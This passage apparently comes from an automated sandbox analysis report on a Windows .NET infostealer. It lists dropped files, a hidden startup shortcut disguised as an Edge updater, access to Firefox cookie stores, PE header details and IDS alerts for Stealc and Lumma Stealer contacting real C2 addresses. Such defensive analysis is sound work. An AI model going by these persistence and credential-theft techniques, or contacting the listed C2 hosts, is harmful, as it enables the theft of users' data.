                                                                                                                                                                                                                                          Preview:L..................F...."...${.......;...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_feba33a9d8824e9086cf3b9956b004f1.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:16 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.953029708881594
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8e07cDYlXPXv+RXgKeKj/jiSAzav/42eEFsuqygm:8e0oDYlf2RB7sevgosryg
                                                                                                                                                                                                                                          MD5:4BA01466B2318C5C340817A69F913AD3
                                                                                                                                                                                                                                          SHA1:99B291BD2492D5A3E3B24E6DB395B3CA61F48979
                                                                                                                                                                                                                                          SHA-256:914C7C64D678CAC0A8336A7C2672577557651DC362A38E96BD6EAD0B7E32EEAD
                                                                                                                                                                                                                                          SHA-512:41C8B8A0915DF3C3EC5A9F284C71FB1D929843F29656E1C813C69946068F1902234C45359CC1D41A2236622B18759B2590AEDCC1D0AE50E71DAD1DB566C5B9C1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYie..Temp..:......EW<2BYie....^..................... ...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):423840
                                                                                                                                                                                                                                          Entropy (8bit):7.988954975057422
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
                                                                                                                                                                                                                                          MD5:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          SHA1:7AAD40783BE4F593A2883B6A66F66F5F624D4550
                                                                                                                                                                                                                                          SHA-256:836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
                                                                                                                                                                                                                                          SHA-512:DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8..*.......Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A*.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y*..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._...*..7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

                                                                                                                                                                                                                                          C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):344992
                                                                                                                                                                                                                                          Entropy (8bit):7.9840811629834345
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:X5EAq+eU9BhaikesEDBVqaDf5kLslwEIF4TN4ha/qks1l9QjjmQ+Nb/Q5AQEO:J5vlBQB/EDBkaDRkyZIF4TN4o/29QjK0
                                                                                                                                                                                                                                          MD5:022CC85ED0F56A3F3E8AEC4AE3B80A71
                                                                                                                                                                                                                                          SHA1:A89B9C39C5F6FCB6E770CEA9491BF7A97F0F012D
                                                                                                                                                                                                                                          SHA-256:BB28BB63ED34A3B4F97A0A26BDA8A7A7C60F961010C795007EDC52576B89E4D3
                                                                                                                                                                                                                                          SHA-512:AC549B9CF50E631BAE01152DB4523FDAB55F426EE77177AF900B088244665E28DE03C10784FE9DB33A2478BEE0D96BD50E5A668D2A2BFDFF3E8706AA8F5D71A2
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`.......7....`.....................................S.... ..B...........x...(&...@......`................................................ ............... ..H............text........ ...................... ..`.rsrc...B.... ......................@..@.reloc.......@......................@..B........................H.......@... ..............................................................+>J]..y.. 9..=...5..t...S..4;g./.k.T.l..>GP.OC.B.$...!.xV...X.,.7.D.qRY..\.8..`M.c....6...`...D6by..e>.Ty...."lZD;...6....FN6T.^:...z._.'.._......r;...n8...Ua..<.D8..4.OvZ.2.j;o.9...;.a.}.y.R......\......`2.fv.J.C.*D.cu..'.^,b......F^I..e..H.N!...&..x..D...."...5....z.J..sE.......H....b&DI..9..Z...l.{,w.F....-. O....2...Ak.8.<.!@@a'...2...A....%.l..?.a<y.....6zZ.....'..7..Q....v>

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.492291528462448
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                          File name:file.exe
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5:ca9bae7d8fa56f97bb596d225e1469c3
                                                                                                                                                                                                                                          SHA1:3df5b3d39a47168aac776137582cbbe6a94a9c22
                                                                                                                                                                                                                                          SHA256:8ef212f5c726e72277b21aed2397390296cb4ce431b2270808925a22852fdbe9
                                                                                                                                                                                                                                          SHA512:6667f71315c799a57baec9f53185b97d219130148c3e0f380ce93d4a016ff8c2a8aa78530e6acd508595154562c3b6264f666ec6799746ee1306529a1144cda6
                                                                                                                                                                                                                                          SSDEEP:3072:wDvSQhc6JZga21nypl2IR1O1SAgDwpjsP/Kc+5vbC7ZQ:w7SQ/S2lpWiwpISJbC7
                                                                                                                                                                                                                                          TLSH:FEE3F5DD766072DFC85BC472DEA82CA8EA6074BB831F4117906716ADAE0D897CF150F2
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f..........".......................... ....@.. ....................................`................................

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Entrypoint:0x42e00a
                                                                                                                                                                                                                                          Entrypoint Section:
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x66FD1938 [Wed Oct 2 09:58:16 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          jmp dword ptr [0042E000h]
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9600x4b.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a0000x5a0.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000xc.reloc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2e0000x8
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x1e0000x48.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          Z Hi?0x20000x1a2380x1a400ec2249ddcc816a945054fe5a3bea0033False1.000381324404762data7.998136765903576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .text0x1e0000xa3000xa400b54b95d561b7e142a4e617496ed52399False0.37280868902439024data4.599356289137648IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rsrc0x2a0000x5a00x600c9099b6e176a1863e09e58525cf19c8cFalse0.419921875data4.070960034584223IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .reloc0x2c0000xc0x200c3a4ecae2e6ec2faaf9144ca99c1c5cbFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          0x2e0000x100x20081d59a5a3680e5ed8e5bf19b827d0b3dFalse0.046875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                          RT_VERSION0x2a0a00x314data0.4352791878172589
                                                                                                                                                                                                                                          RT_MANIFEST0x2a3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                          2024-10-02T14:42:47.226017+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649708104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:01.409630+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649725147.45.44.10480TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:01.458994+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649726147.45.44.10480TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:05.794996+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:06.002213+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:06.028082+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config146.8.231.10980192.168.2.658515TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:06.202615+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:06.224077+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config146.8.231.10980192.168.2.658515TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:06.710249+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:06.994065+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:10.505057+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:11.376655+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:12.023945+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:12.823465+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:14.542466+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:15.452175+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.65851546.8.231.10980TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:17.899197+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.658519147.45.44.10480TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:22.072689+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658521172.67.208.141443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:22.072689+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658521172.67.208.141443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:22.085706+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649708104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:22.779200+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65852249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:23.195875+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658524188.114.97.3443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:23.195875+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658524188.114.97.3443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:23.288683+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649708104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:24.072708+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65852749.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:24.146207+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658526104.21.56.150443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:24.146207+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658526104.21.56.150443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:25.224401+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658530172.67.184.196443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:25.224401+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658530172.67.184.196443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:25.431860+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65853249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:26.085649+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.658528104.26.12.20580TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:26.228434+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.65853249.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:26.251833+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658533104.21.18.193443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:26.251833+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658533104.21.18.193443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:26.936355+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65853549.12.197.9443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:27.270662+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.658536172.67.195.67443TCP
                                                                                                                                                                                                                                          2024-10-02T14:43:27.270662+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.658536172.67.195.67443TCP
